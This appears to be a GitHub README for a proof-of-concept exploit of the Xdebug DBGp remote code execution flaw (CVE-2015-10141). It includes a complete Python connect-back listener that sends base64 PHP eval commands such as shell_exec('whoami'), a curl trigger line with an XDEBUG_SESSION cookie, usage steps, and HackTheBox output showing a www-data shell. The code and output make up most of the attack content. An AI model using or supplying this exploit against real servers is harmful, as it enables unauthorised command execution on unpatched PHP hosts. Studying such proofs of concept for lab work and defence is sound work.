# PoC-CVE-2015-10141
**Custom Python Proof-of-Concept exploit script for Xdebug ≤ 2.5.5 and earlier versions (CVE-2015-10141).**
---
## Description
This repository contains my **Proof-of-Concept (PoC) exploit** for the **Xdebug remote code execution vulnerability** in versions **2.5.5 and earlier**.
The root cause is that Xdebug's **DBGp remote-debugging protocol** carries **no authentication**: once the debugging engine inside PHP has connected to a debugging client, it executes whatever `eval` command that client sends. The script plays the role of that client. It listens on port `9000` (Xdebug's default `xdebug.remote_port`), triggers a debugging session on the target with an `XDEBUG_SESSION` cookie so that the target connects back to the listener, and uses the resulting connection to achieve **remote command execution** as the web server user (`www-data` in the demonstration below).
- **Vulnerability**: [CVE-2015-10141](https://nvd.nist.gov/vuln/detail/CVE-2015-10141)
- **Vulnerability type**: Remote Code Execution (RCE)
- **Affected software**: Xdebug ≤ 2.5.5
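The exchange described above, written out as an added example (this is not the repository's `exploit.py`, nor Xdebug's code): the engine speaks first with an `init` packet, the client answers with `eval -i <id> -- <base64 PHP>`, and the engine returns the value as a base64 string property. Framing (`<length>\0<xml>\0`) and the `eval` command follow the DBGp specification; the `fake_xdebug_engine` is a constructed stand-in so the round trip runs offline, and port `9000`, the `olympus` idekey, the `X-Forwarded-For` trigger header and the `shell_exec('whoami')` payload are illustrative assumptions rather than anything taken from the script.

```python
import base64
import socket
import threading
import xml.etree.ElementTree as ET

NS = "{urn:debugger_protocol_v1}"

def frame(xml_text):
    body = xml_text.encode()                        # engine -> IDE: <byte length> NUL <xml> NUL
    return str(len(body)).encode() + b"\x00" + body + b"\x00"

def build_eval_command(transaction_id, php_code):
    """IDE -> engine: 'eval -i <id> -- <base64 php>' + NUL; Xdebug <= 2.5.5 runs it unauthenticated."""
    data = base64.b64encode(php_code.encode()).decode()
    return f"eval -i {transaction_id} -- {data}\x00".encode()

def parse_dbgp_packets(buf):
    """Split a receive buffer into complete engine packets: (xml list, leftover bytes)."""
    packets = []
    while True:
        nul = buf.find(b"\x00")
        if nul == -1:
            break                                   # length prefix not complete yet
        start, end = nul + 1, nul + 1 + int(buf[:nul])  # int() rejects a non-numeric prefix
        if len(buf) < end + 1:
            break                                   # payload or trailing NUL still in flight
        packets.append(buf[start:end].decode())
        buf = buf[end + 1:]
    return packets, buf

def parse_eval_response(xml_text, transaction_id):
    """Our eval <response> as {"output": ...} or {"error": code, "message": ...}; else None."""
    root = ET.fromstring(xml_text)
    if (root.tag != NS + "response" or root.get("command") != "eval"
            or root.get("transaction_id") != str(transaction_id)):
        return None
    err = root.find(NS + "error")
    if err is not None:
        msg = err.find(NS + "message")
        return {"error": err.get("code"), "message": msg.text if msg is not None else ""}
    prop = root.find(NS + "property")
    text = (prop.text or "") if prop is not None else ""
    if prop is not None and prop.get("encoding") == "base64":
        text = base64.b64decode(text).decode(errors="replace")
    return {"output": text}

def run_eval(conn, php_code, transaction_id=1):
    """Drive one connected-back engine: wait for <init>, send eval, return its result."""
    buf, sent = b"", False
    while True:
        chunk = conn.recv(4096)
        if not chunk:
            raise ConnectionError("engine closed the connection before answering")
        packets, buf = parse_dbgp_packets(buf + chunk)
        for pkt in packets:
            if not sent:                            # the engine speaks first, with <init>
                if ET.fromstring(pkt).tag == NS + "init":
                    conn.sendall(build_eval_command(transaction_id, php_code))
                    sent = True
                continue
            result = parse_eval_response(pkt, transaction_id)
            if result and "error" in result:
                raise RuntimeError(f"DBGp error {result['error']}: {result['message']}")
            if result:
                return result["output"]

def listen_and_exploit(php_code, bind="0.0.0.0", port=9000):
    """Real connect-back listener (needs a network). Start it, then trigger a session on the
    target: curl http://TARGET/ -H 'Cookie: XDEBUG_SESSION=olympus' -H 'X-Forwarded-For: <you>'"""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            return peer, run_eval(conn, php_code)

def fake_xdebug_engine(sock, canned_output):
    """Constructed stand-in for the vulnerable engine (not Xdebug): sends <init>, trusts
    whatever command comes back, answers an eval with canned_output as a base64 string."""
    sock.sendall(frame('<init xmlns="urn:debugger_protocol_v1" language="PHP" '
                       'protocol_version="1.0" appid="4242" idekey="olympus"></init>'))
    parts = sock.recv(4096).rstrip(b"\x00").decode().split(" ")  # one recv: command is small
    txid = parts[parts.index("-i") + 1]                          # ['eval','-i','7','--',b64]
    payload = base64.b64encode(canned_output.encode()).decode()
    sock.sendall(frame(f'<response xmlns="urn:debugger_protocol_v1" command="eval" '
                       f'transaction_id="{txid}"><property type="string" encoding="base64">'
                       f'{payload}</property></response>'))
    sock.close()

def demo_offline(php_code="shell_exec('whoami')", canned_output="www-data\n"):
    """The full exchange over a socketpair: no network and no real Xdebug needed."""
    ide_side, engine_side = socket.socketpair()
    threading.Thread(target=fake_xdebug_engine, args=(engine_side, canned_output), daemon=True).start()
    with ide_side:
        return run_eval(ide_side, php_code, transaction_id=7)

if __name__ == "__main__":
    print(demo_offline(), end="")                   # www-data
```

`parse_dbgp_packets` keeps unconsumed bytes so a response split across TCP segments is reassembled rather than mis-parsed, and `parse_eval_response` checks the transaction id and surfaces a DBGp `<error>` instead of silently returning an empty string; both are the places a quick one-off script usually goes wrong against a real target.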
---
## Usage
```bash
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py
```
When prompted, enter the target IP where Xdebug is hosted.
Demonstration from my recent HackTheBox [Olympus](https://github.com/n0m4d22/HackTheBox-Writeups/blob/main/machines/medium/olympus/olympus-writeup.md) (Medium) write-up:
```bash
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data
```
---
## Requirements
- Python 3.x
- Target running Xdebug ≤ 2.5.5 with remote debugging enabled (`xdebug.remote_enable=1`) and configured to connect back to the attacker, either through `xdebug.remote_connect_back=1` or an `xdebug.remote_host` you control
- Port `9000` on your machine reachable from the target: the target initiates the connection, so a firewall or NAT between you and it will block the exploit
---
## Disclaimer
This project is created for educational purposes only.
**Do NOT** use this exploit against systems without explicit authorization. I am not responsible for any misuse of this code.
---
## References
- [NVD – CVE-2015-10141](https://nvd.nist.gov/vuln/detail/CVE-2015-10141)
- [ExploitDB – 44568](https://www.exploit-db.com/exploits/44568)
- [Xdebug Official Site](https://xdebug.org/)